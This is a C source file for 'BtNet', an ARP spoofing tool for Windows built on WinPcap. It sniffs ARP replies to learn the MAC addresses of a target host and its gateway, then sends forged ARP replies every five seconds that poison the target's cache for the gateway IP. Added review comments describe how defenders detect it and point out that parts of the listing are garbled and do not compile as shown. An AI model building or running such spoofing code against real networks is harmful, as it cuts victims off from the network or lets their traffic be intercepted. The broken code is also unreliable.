
📄 vv.c

#include <packet32.h> 
#include "ntddndis.h" 
#include <stdio.h> 
#include <conio.h> 
#include <winsock2.h> 
#include <windows.h> 

#pragma comment(lib,"ws2_32") 
#pragma comment(lib,"packet") 

// EtherType values; ETH_IP is also stored in the ARP protocol-type field.
#define ETH_IP 0x0800
#define ETH_ARP 0x0806
#define ARP_REQUEST 0x0001 // ARP request opcode
#define ARP_REPLY 0x0002 // ARP reply opcode
#define ARP_HARDWARE 0x0001 // value stored in the ARP hardware-type field
#define max_num_adapter 10 // number of rows in adapterlist

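// Byte-pack the wire-format structures below so that no padding is inserted
// between fields; the previous packing is restored after the last of them.
#pragma pack(push,1)

// Ethernet II frame header: 6 + 6 + 2 = 14 bytes.
typedef struct ethdr
{
  unsigned char eh_dst[6]; // destination Ethernet address
  unsigned char eh_src[6]; // source Ethernet address
  unsigned short eh_type; // EtherType (ETH_IP / ETH_ARP), stored with htons()
}ETHDR,*PETHDR;

// ARP header for Ethernet/IPv4.
// NOTE(review): arp_spa/arp_tpa are `unsigned long`; the layout only matches
// the wire format where long is 4 bytes (as on Windows targets) - confirm.
typedef struct arphdr
{
  unsigned short arp_hdr; // hardware type
  unsigned short arp_pro; // protocol type
  unsigned char arp_hln; // hardware address length
  unsigned char arp_pln; // protocol address length
  unsigned short arp_opt; // operation (ARP_REQUEST / ARP_REPLY)
  unsigned char arp_sha[6]; // sender Ethernet address
  unsigned long arp_spa; // sender IP address
  unsigned char arp_tha[6]; // target Ethernet address
  unsigned long arp_tpa; // target IP address
}ARPHDR,*PARPHDR;

// One IP address together with the Ethernet address recorded for it.
typedef struct ip_mac
{
u_long ip;
unsigned char mac[6];
}IP_MAC,*PIP_MAC;

// The original ended with a second push, which left 1-byte packing in force
// for the rest of the translation unit; pop restores the saved alignment.
#pragma pack(pop)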

// Process-wide state shared by main() and the worker threads.
// NOTE(review): the flags and IP_MAC records below are written by sniff() and
// read by the sender threads with no synchronization visible in this file.
LPADAPTER lpAdapter; // adapter opened in main(); used by every thread
char adapterlist[max_num_adapter][1024]; // adapter names copied out of PacketGetAdapterNames()
IP_MAC toipandmac; // IP (host order) and MAC of the -h host
IP_MAC oipandmac,myipandmac; // same for the -o host and for the local adapter
BOOL param6=FALSE; // TRUE once a -m argument has been parsed
char *noMACstr; // cursor into the -m argument text
char noMAC[6][3]; // two hex characters per MAC byte taken from -m
u_long mytoIP,oIP; // host-order IPs: the sendSR() target and the -o address
BOOL sendtoOip; // selects which sender fields sendARPPacket() uses
MSG msg; // message storage for the loop in sendSRTimer()
UINT newtimer; // return value of SetTimer()
char MYIP[20]="128.128.128.128"; // fixed sender IP used by sendARPPacket() while sendtoOip is FALSE
BOOL toipandmac_flag=FALSE,myipandmac_flag=FALSE,oipandmac_flag=FALSE; // set by sniff() once the matching MAC is recorded

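/*
 * Convert one hexadecimal digit to its numeric value.
 *
 * Returns 0..15 for '0'-'9', 'a'-'f' and 'A'-'F', and -1 for any other
 * character so that the caller can reject malformed input.
 *
 * The character constants in the published listing were typographic quotes,
 * which no C compiler accepts; they are plain ASCII quotes here.
 */
int getint(char c)
{
  if((c>='0')&&(c<='9'))
    return c-'0';
  if((c>='a')&&(c<='f'))
    return 10+c-'a';
  if((c>='A')&&(c<='F'))
    return 10+c-'A';
  return -1; /* not a hex digit */
}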

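/*
 * Print the program banner and the command-line usage text to stdout.
 * Called by main() when the argument count or the -h/-o switches are wrong.
 */
void start()
{
  printf("BtNet //--an ARP Tool test the Windows Break the Internet\n");
  printf("written by Ruder,10/2003\n");
  /* The published line ended in "\;n", an invalid escape sequence; it is a
     plain newline here like every other line of the banner. */
  printf("Homepage: http://xEyes.cdut.net/ruder/index.htm\n");
  printf("E-mail: cocoruder@163.com\n");
  printf("\nUsage: BtNet -h attackIP -o gateIP [-m spoofedMAC]\n");
  printf("Example:\n");
  printf("BtNet -h 202.115.138.12 -o 202.115.138.1\n");
  printf("BtNet -h 202.115.138.12 -o 202.115.138.1 -m 00-50-fc-6a--6b--7c\n");
  printf(" Warning: You must have installed the winpcap_2.3 or winpcap_3.0_alpha\n");
  return ;
}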

// Capture thread. Switches the adapter to promiscuous mode and reads frames
// until a key is pressed, a receive fails, or all three tracked addresses have
// been resolved. For each ARP reply whose sender IP equals toipandmac.ip,
// myipandmac.ip or oipandmac.ip while that record's flag is still FALSE, it
// prints the pair, stores the frame's source MAC in the record and sets the
// flag. Always returns 0.
//
// NOTE(review): several array accesses in this listing appear to have lost
// text in extraction, so the code does not compile as shown.
// NOTE(review): neither packet structure allocated here is released on any
// return path.
DWORD WINAPI sniff(LPVOID)
{
LPPACKET lppackets,lpPacketr;
char recvbuf[1024*250]; // 250 KB receive buffer, an automatic variable of this thread
  ULONG ulbytesreceived,off;
  ETHDR *eth;
  ARPHDR *arp;
  char *buf,*pChar,*base;
  char szTemp[20];
  struct bpf_hdr *hdr;

// lppackets is allocated here and not referenced again in this function.
if((lppackets=PacketAllocatePacket())==FALSE)
  {
    printf("PacketAllocatePacket send Error: %d\n",GetLastError());
    return 0;
  }

  // Failure to enter promiscuous mode is only a warning; capture continues.
  if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
  {
    printf("Warning: Unable to set the adapter to promiscuous mode\n");
  }

  if(PacketSetBuff(lpAdapter,500*1024)==FALSE)
  {
    printf("PacketSetBuff Error: %d\n",GetLastError());
    return 0;
  }

  if(PacketSetReadTimeout(lpAdapter,1)==FALSE)
  {
    printf("Warning: Unable to set the timeout\n");
  }

  if((lpPacketr=PacketAllocatePacket())==FALSE)
  {
    printf("PacketAllocatePacket receive Error: %d\n",GetLastError());
    return 0;
  }

  PacketInitPacket(lpPacketr,(char *)recvbuf,sizeof(recvbuf));

  // Outer loop: one receive call per pass, until a key is pressed.
  while(!kbhit())
  {
    if(PacketReceivePacket(lpAdapter,lpPacketr,TRUE)==FALSE)
    {
      return 0;
    }
    //getdata(lppacketr,option);
    ulbytesreceived=lpPacketr->ulBytesReceived;
    buf=(char *)lpPacketr->Buffer;

    off=0;
  // Inner loop: walk the records in the receive buffer, each a bpf_hdr
  // followed by the captured frame.
  while(off<ulbytesreceived)
  {
    if(kbhit())
    {
        return 0;
    }
    hdr=(struct bpf_hdr *)(buf+off);
    off+=hdr->bh_hdrlen;

    pChar=(char *)(buf+off);
    base=pChar;
    off=Packet_WORDALIGN(off+hdr->bh_caplen); // offset of the next record

    // NOTE(review): bh_caplen is never compared with
    // sizeof(ETHDR)+sizeof(ARPHDR), and off is not re-checked against
    // ulbytesreceived after the header skip, so a short or truncated record
    // is parsed using whatever bytes follow it in recvbuf.
    eth=(PETHDR)pChar; // Ethernet header
    arp=(PARPHDR)(pChar+sizeof(ETHDR)); // ARP header
    int i;
      
    if((eth->eh_type==htons(ETH_ARP))&&
        (arp->arp_opt==htons(ARP_REPLY)))
    {
      // The target-IP filter below is commented out, so replies addressed to
      // any host are considered.
      //if (arp->arp_tpa==htonl(ntohl(inet_addr(MYIP))))
        {
        // Stop as soon as all three MAC addresses are known.
        if(oipandmac_flag&&myipandmac_flag&&toipandmac_flag)
          return 0;
        // htonl() here swaps the wire-order sender IP for comparison with the
        // values main() stored after ntohl().
        if (((toipandmac.ip==htonl(arp->arp_spa))&&(toipandmac_flag==FALSE))
          ||((myipandmac.ip==htonl(arp->arp_spa))&&(myipandmac_flag==FALSE))
          ||((oipandmac.ip==htonl(arp->arp_spa))&&(oipandmac_flag==FALSE)))
        {
        memset(szTemp,0,sizeof(szTemp));
        memcpy(szTemp,&arp->arp_spa,sizeof(arp->arp_spa));
        
        printf("[IP]:");
        printf("%s",inet_ntoa(*((struct in_addr *)szTemp)));
        printf("[MAC]:");
        for(i=0;i<5;i++)
        {
        printf("%.2x-",eth->eh_src);
        }
        printf("%.2x",eth->eh_src[5]);
        printf("\n");
        
        // Record the Ethernet source address under whichever tracked IP matched.
        if (toipandmac.ip==htonl(arp->arp_spa))
        {
          for(i=0;i<6;i++)
          toipandmac.mac=eth->eh_src;
          toipandmac_flag=TRUE;
        }

        if (oipandmac.ip==htonl(arp->arp_spa))
        {
          for(i=0;i<6;i++)
          oipandmac.mac=eth->eh_src;
          oipandmac_flag=TRUE;
        //   printf("if you have get the MAC Addresses enough,Press any key for staring!\n");
        }
        if(myipandmac.ip==htonl(arp->arp_spa))
        {
          for(i=0;i<6;i++)
          myipandmac.mac=eth->eh_src;
          myipandmac_flag=TRUE;
        }
        }
  }
}
  continue;
  }
}
  return 0;
}


// Thread entry: builds one ARP request for the host-order IP that dwsendtoIP
// points to and sends it once on lpAdapter. Always returns 0.
//
// While sendtoOip is FALSE the sender fields are the filler byte 0xa5 and the
// MYIP string; once it is TRUE they are replaced by the local MAC and IP that
// sniff() recorded, and nothing is sent if that MAC is not yet known.
//
// Defender's view: requests sent in the first mode carry the sender IP held
// in MYIP (128.128.128.128 by default) and 0xa5 filler in the sender hardware
// address, a pattern that ARP monitoring can match on.
//
// NOTE(review): several array accesses in this listing appear to have lost
// text in extraction, so the code does not compile as shown.
// NOTE(review): lpPacket is not freed on the early return taken when the
// local MAC is unknown.
DWORD WINAPI sendARPPacket(LPVOID dwsendtoIP)
{
  LPPACKET lpPacket;
  ETHDR eth;
  ARPHDR arphdr;
  int i;
  char szPacketBuf[600];
  u_long sendtoIP=*(u_long *)dwsendtoIP; // caller passes the address of a u_long
  //struct sockaddr_in sin;

  lpPacket = PacketAllocatePacket();
  if(lpPacket==NULL)
  {
    printf("\nPacketAllocatePacket error!");
    return 0;
  }
  eth.eh_type=htons(ETH_ARP);
  // Default addressing: 0xff for the destination/target fields, 0xa5 for the
  // source/sender fields.
  for(i=0;i<6;i++)
  {
    eth.eh_dst=0xff;
    eth.eh_src=0xa5;
    arphdr.arp_sha=0xa5;
    arphdr.arp_tha=0xff;
  }

  arphdr.arp_hdr=htons(ARP_HARDWARE);
  arphdr.arp_pro=htons(ETH_IP);
  arphdr.arp_opt=htons(ARP_REQUEST);
  arphdr.arp_hln=6;
  arphdr.arp_pln=4;

  arphdr.arp_tpa=htonl(sendtoIP);
// htonl(ntohl(x)) leaves the value produced by inet_addr() unchanged.
arphdr.arp_spa=htonl(ntohl(inet_addr(MYIP)));
  if(sendtoOip)
  {


    // Switch to the real local MAC/IP once sniff() has learned them.
    if(myipandmac_flag)
    {
        for(i=0;i<6;i++)
        {
          eth.eh_src=myipandmac.mac;
          arphdr.arp_sha=myipandmac.mac;
          arphdr.arp_spa=htonl(myipandmac.ip);
          //memset(MYIP,0,sizeof(MYIP));
          
        }
    }
    else
    {
        printf("My MAC Address Can’t Find!\n");
        return 0;
    }
  }

  // Lay out Ethernet header then ARP header in a zeroed buffer.
  memset(szPacketBuf,0,sizeof(szPacketBuf));
  memcpy(szPacketBuf,e,sizeof(ETHDR));
  memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));

  // 60 bytes are handed to the driver: the two headers plus zero padding.
  PacketInitPacket(lpPacket,szPacketBuf,60);
  if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
{
printf("warning: Unable to send more than one packet in a single write!\n");
}

  if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
{
printf("Error sending the packets!\n");
PacketFreePacket(lpPacket);
    return 0;
}

  PacketFreePacket(lpPacket);

  return 0;
}


// Timer callback installed by sendSRTimer(): builds and sends one ARP reply
// addressed to the host mytoIP, with the -o address (oIP) as sender IP and,
// as sender MAC, either the -m value or - without -m - the MAC sniff()
// recorded for the -h host itself. Prints a one-line summary and returns 0.
//
// A host that accepts the reply ends up with an ARP-cache entry binding the
// -o IP (called gateIP in the usage text) to that MAC instead of the real one.
//
// Defender's view: this shows up as unsolicited ARP replies for the gateway
// IP repeating at the 5-second timer interval, with a sender MAC that differs
// from the gateway's known address. Dynamic ARP Inspection on the switch,
// a static ARP entry for the gateway, and ARP-binding monitoring all address
// it.
//
// NOTE(review): several array accesses in this listing appear to have lost
// text in extraction, so the code does not compile as shown.
// NOTE(review): the function takes no parameters yet is installed through a
// TIMERPROC cast; a timer callback is invoked with four arguments, so the
// declared signature does not match the call.
// NOTE(review): lpPacket is leaked on both early returns that follow the
// allocation (unknown target MAC, bad -m digit).
DWORD WINAPI sendSR()
{
  ETHDR eth;
  ARPHDR arphdr;
  int i;
  char szPacketBuf[600];
  LPPACKET lpPacket;
  unsigned char toMAC[6];
  struct sockaddr_in sin;
  u_long toIP=mytoIP;

  //if ((myipandmac_flag==FALSE)||(oipandmac_flag==FALSE)||(toipandmac_flag==FALSE))
  //{
  //   printf("Can’t get all MAC address!\n");
  //   return 0;
  //}
  lpPacket = PacketAllocatePacket();
if(lpPacket == NULL)
{
printf("\nError:failed to allocate the LPPACKET structure.\n");
return 0;
}
  // Nothing is sent until sniff() has recorded the -h host's MAC.
  if (toipandmac_flag==FALSE)
  {
    printf("Can’t get toMAC address!\n");
    return 0;
  }

  memset(toMAC,0,sizeof(toMAC));
  memcpy(toMAC,&toipandmac.mac,sizeof(toipandmac.mac));

  if (param6)
  {
    // -m given: decode each pair of hex characters with getint() and use the
    // result as source/sender MAC; destination/target is the -h host's MAC.
    for(i=0;i<6;i++)
    {
        int t1,t2;
        char c1,c2;
        c1=noMAC[0];
        c2=noMAC[1];

        t1=getint(c1);
        t2=getint(c2);

        if((t1==-1)||(t2==-1))
        {
          printf("-m parameter error!\n");
          return 0;
        }
  
        eth.eh_src=t1*16+t2;
        eth.eh_dst=toMAC;
        arphdr.arp_sha=t1*16+t2;
        arphdr.arp_tha=toMAC;
    }
  }
  else
  {
    // No -m: all four address fields are filled from the -h host's own MAC.
    for(i=0;i<6;i++)
    {
        eth.eh_src=toMAC;
        eth.eh_dst=toMAC;
        arphdr.arp_sha=toMAC;
        arphdr.arp_tha=toMAC;
    }
  }

  eth.eh_type=htons(ETH_ARP);

  // Sender IP is the -o address, target IP the -h address.
  arphdr.arp_spa=htonl(oIP);
  arphdr.arp_tpa=htonl(toIP);

  arphdr.arp_hdr=htons(ARP_HARDWARE);
  arphdr.arp_pro=htons(ETH_IP);
  arphdr.arp_opt=htons(ARP_REPLY);
  arphdr.arp_hln=6;
  arphdr.arp_pln=4;

  memset(szPacketBuf,0,sizeof(szPacketBuf));
  memcpy(szPacketBuf,e,sizeof(ETHDR));
  memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));

  // 60 bytes are handed to the driver: the two headers plus zero padding.
  PacketInitPacket(lpPacket,szPacketBuf,60);
  if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
{
printf("warning: Unable to send more than one packet in a single write!\n");
}
  if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
{
printf("Error sending the packets!\n");
PacketFreePacket(lpPacket);
    return 0;
}
  PacketFreePacket(lpPacket);

  // Console summary: target IP, claimed sender IP, claimed sender MAC.
  sin.sin_addr.s_addr=arphdr.arp_tpa;

  printf("spoof %s: ",inet_ntoa(sin.sin_addr));
  sin.sin_addr.s_addr=arphdr.arp_spa;
  printf("%s-->",inet_ntoa(sin.sin_addr));

    for(i=0;i<5;i++)
        printf("%.2x-",arphdr.arp_sha);
    printf("%x",arphdr.arp_sha[5]);
  printf("\n");

  return 0;
}


// Thread entry: stores the host-order IP that dwtoIP points to in mytoIP,
// installs a 5-second timer whose callback is sendSR(), and then pumps this
// thread's message queue so the timer fires. Returns 0 when GetMessage()
// returns 0.
//
// NOTE(review): nothing in this file posts a quit message or calls
// KillTimer(), so the loop looks like it runs until the process is killed.
// NOTE(review): SetTimer()'s return value is stored in a UINT and is never
// checked for failure.
DWORD WINAPI sendSRTimer(LPVOID dwtoIP)
{
  printf("Waiting spoof Start\n");
  mytoIP=*(u_long *)dwtoIP;
  newtimer=SetTimer(NULL,NULL,5*1000,TIMERPROC(sendSR)); // 5*1000 ms period

  while(GetMessage(&msg,0,0,0))
  {
    TranslateMessage(&msg);
    DispatchMessage(&msg);
  }
  return 0;
}

// Entry point. Parses "-h <ip> -o <ip> [-m <mac>]", lets the user pick a
// capture adapter, prints its link and address information, then starts the
// worker threads: sniff() to collect ARP replies, three one-shot
// sendARPPacket() threads (local IP, -h IP, -o IP), and sendSRTimer(), on
// which it waits. Returns 0 on the usage path and at the end, -1 when the
// adapter list, the adapter or its address information cannot be obtained.
//
// NOTE(review): parts of this listing appear to have lost text in extraction
// (typographic quotes, array accesses without a subscript), so it does not
// compile as shown.
int main(int argc,char *argv[])
{
  HANDLE thread1,thread2,thread3;
  WCHAR adaptername[8192];
  WCHAR *name1,*name2;
  ULONG adapterlength;
  DWORD threadid1,threadid2,threadid3;
  u_long toIP,myip;
  struct NetType ntype;
  struct sockaddr_in sin;
  struct npf_if_addr ipbuff;
  int adapternum=0,opti=0,open,i,j; // opti is never used; j is only assigned
  long npflen;

  // Exactly 4 or 6 arguments are accepted, with -h first and -o third.
  if((argc!=5)&&(argc!=7))
  {
    start();
    return 0;
  }
  else if((strcmp(argv[1],"-h")!=0)||(strcmp(argv[3],"-o")!=0))
  {
    start();
    return 0;
  }

  // Both addresses are kept in host byte order.
  // NOTE(review): the inet_addr() result is not checked for INADDR_NONE, so a
  // malformed address is used as if it were valid.
  toIP=ntohl(inet_addr(argv[2]));
  oIP=ntohl(inet_addr(argv[4]));

  // With argc==5, argv[5] is the terminating NULL, so this test skips -m.
  if (argv[5]!=NULL)
  {
  if (strcmp(argv[5],"-m")==0)
  {
    noMACstr=argv[6];
    j=0;

        // NOTE(review): the length and format of argv[6] are never validated;
        // the loop copies 2 bytes and advances 3, six times, whatever the
        // string's real length, so a short argument is read past its end.
        for(i=0;i<6;i++)
        {
          memset(noMAC,0,sizeof(noMAC));
          memcpy(noMAC,noMACstr,2);
          noMACstr=noMACstr+3;
        }
  param6=TRUE;
  }
  }
  printf("\nLibarary Version: %s",PacketGetVersion());
  adapterlength=sizeof(adaptername);

  if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE) // get the adapter list
  {
    printf("PacketGetAdapterNames Error: %d\n",GetLastError());
    return -1;
  }
  
  name1=adaptername;
  name2=adaptername;
  i=0;

  // Split the returned buffer at NUL characters; the scan stops at two
  // consecutive NULs.
  // NOTE(review): on the first pass name1-1 points one element before
  // adaptername. Neither i (against max_num_adapter) nor the copied length
  // (against the 1024-byte row) is bounded before the memcpy.
  while((*name1!=’\0’) || (*(name1-1)!=’\0’))
  {
    if(*name1==’\0’)
    {
        memcpy(adapterlist,name2,2*(name1-name2));
        name2=name1+1;
        i++;
    }
    name1++;
  }

  adapternum=i;
  printf("\nAdapters Installed:\n");
  for(i=0;i<adapternum;i++)
    wprintf(L"%d - %s\n",i+1,adapterlist);

  // NOTE(review): scanf()'s return value is ignored; non-numeric input leaves
  // `open` unset and stays in the input stream, so the loop cannot make
  // progress.
  do
  {
    printf("\nSelect the number of the adapter to open: ");
    scanf("%d",&open);
    if(open>=1 && open<=adapternum)
        break;
  }while(open<1 || open>adapternum);

  lpAdapter=PacketOpenAdapter(adapterlist[open-1]);

  if(!lpAdapter || (lpAdapter->hFile==INVALID_HANDLE_VALUE))
  {
    printf("PacketOpenAdapter Error: %d\n",GetLastError());
    return -1;
  }

  if(PacketGetNetType(lpAdapter,&ntype))
  {
    printf("\n\t\t*** Host Information ***\n");
    printf("[LinkTpye:]\t%d\t\t",ntype.LinkType);
    printf("[LinkSpeed:]\t%d b/s\n",ntype.LinkSpeed);
  }

  // Read the adapter's address record; its IP address becomes myip.
  npflen=sizeof(ipbuff);
  if(PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen))
  {
    sin=*(struct sockaddr_in *)&(ipbuff.Broadcast);
    printf("[Broadcast:]\t%.16s\t",inet_ntoa(sin.sin_addr));

    sin=*(struct sockaddr_in *)&(ipbuff.SubnetMask);
    printf("[SubnetMask:]\t%.16s\n",inet_ntoa(sin.sin_addr));

    sin=*(struct sockaddr_in *)&(ipbuff.IPAddress);
    printf("[IPAddress:]\t%.16s\t",inet_ntoa(sin.sin_addr));
    myip=ntohl(sin.sin_addr.s_addr);

    printf("[MACAddress:]");
  }
  else
  {
    printf("\nNot get enough data\n");
    //PacketFreePacket(lppackets);
    PacketCloseAdapter(lpAdapter);
    return -1;
  }
  printf("\n");

  // The three IPs whose MAC addresses sniff() will try to learn.
  oipandmac.ip=oIP;
  toipandmac.ip=toIP;
  myipandmac.ip=myip;
  sendtoOip=FALSE;
  
  // Start capture first, then send the three ARP requests. Ordering relies
  // on Sleep() calls only, and sendtoOip is flipped between thread starts.
  // NOTE(review): CreateThread() results are not checked, each thread2 handle
  // is closed without waiting for the thread, and thread1/thread3 are never
  // closed. The threads receive pointers to locals of this function.
  thread1=CreateThread(NULL,0,sniff,NULL,0,&threadid1);
  Sleep(300);
  thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&myip,0,&threadid2);
  Sleep(100);
  CloseHandle(thread2);
  thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&toIP,0,&threadid2);
  Sleep(10);
  CloseHandle(thread2);
  sendtoOip=TRUE;
  Sleep(200);
  thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&oIP,0,&threadid2);
  Sleep(10);
  CloseHandle(thread2);
//   WaitForSingleObject(thread1,INFINITE);
  // Hand over to the periodic sender and block until that thread exits.
  thread3=CreateThread(NULL,0,sendSRTimer,(LPVOID)&toIP,0,&threadid3);
  WaitForSingleObject(thread3,INFINITE);

  PacketCloseAdapter(lpAdapter);

return 0;
}
